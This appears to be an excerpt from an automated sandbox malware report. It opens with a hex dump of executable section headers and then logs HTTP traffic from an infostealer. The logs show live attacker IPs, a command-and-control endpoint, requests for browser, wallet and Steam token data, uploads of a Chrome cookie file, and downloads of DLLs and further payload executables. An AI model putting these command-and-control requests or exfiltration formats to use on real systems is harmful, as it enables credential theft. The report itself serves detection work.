00 00 00 00 00 00 00 00 00 00 e0 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 50 22 00 00 b0 9c 00 00 4e 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 35 35 43 34 37 42 36 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="hwid"E8855C47B6BC4158135236------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="build"jony------JEHJKJEBGHJJKEBGIECA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="message"browsers------HCGCBFHCFCFBFIEBGHJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 2d 2d 0d 0a Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="message"plugins------CAAAAFBKFIECAAKECGCA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 2d 2d 0d 0a Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="message"fplugins------JJEGCBGIDHCAKEBGIIDB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: 85.28.47.4Content-Length: 6675Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3L
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 2d 2d 0d 0a Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file"------IJKJJKFHIJKKFHJJECBA--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 85.28.47.4Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 41 2d 2d 0d 0a Data Ascii: ------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------JEHJKJEBGHJJKEBGIECAContent-Disposition: form-data; name="file"------JEHJKJEBGHJJKEBGIECA--
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 85.28.47.4Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBFHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4b 4b 46 49 49 4a 4a 4b 4a 4b 46 49 45 43 42 46 2d 2d 0d 0a Data Ascii: ------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------EHJKKKFIIJJKJKFIECBFContent-Disposition: form-data; name="message"wallets------EHJKKKFIIJJKJKFIECBF--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEHost: 85.28.47.4Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDHost: 85.28.47.4Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="file"------DBAEHCGHIIIDHIECFHJD--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAKECAEGDHIECBGHIIIHost: 85.28.47.4Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 31 38 33 38 66 32 61 38 39 31 37 65 64 30 38 64 63 35 62 63 66 36 35 38 39 66 38 32 39 31 30 35 66 35 39 32 38 38 63 62 66 64 31 30 31 30 62 36 39 39 63 65 34 30 64 37 31 36 30 66 35 38 30 33 31 37 35 36 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 49 2d 2d 0d 0a Data Ascii: ------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="token"f1838f2a8917ed08dc5bcf6589f829105f59288cbfd1010b699ce40d7160f58031756649------ECAKECAEGDHIECBGHIIIContent-Disposition: form-data; name="message"jbdtaijovg------ECAKECAEGDHIECBGHIII--
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
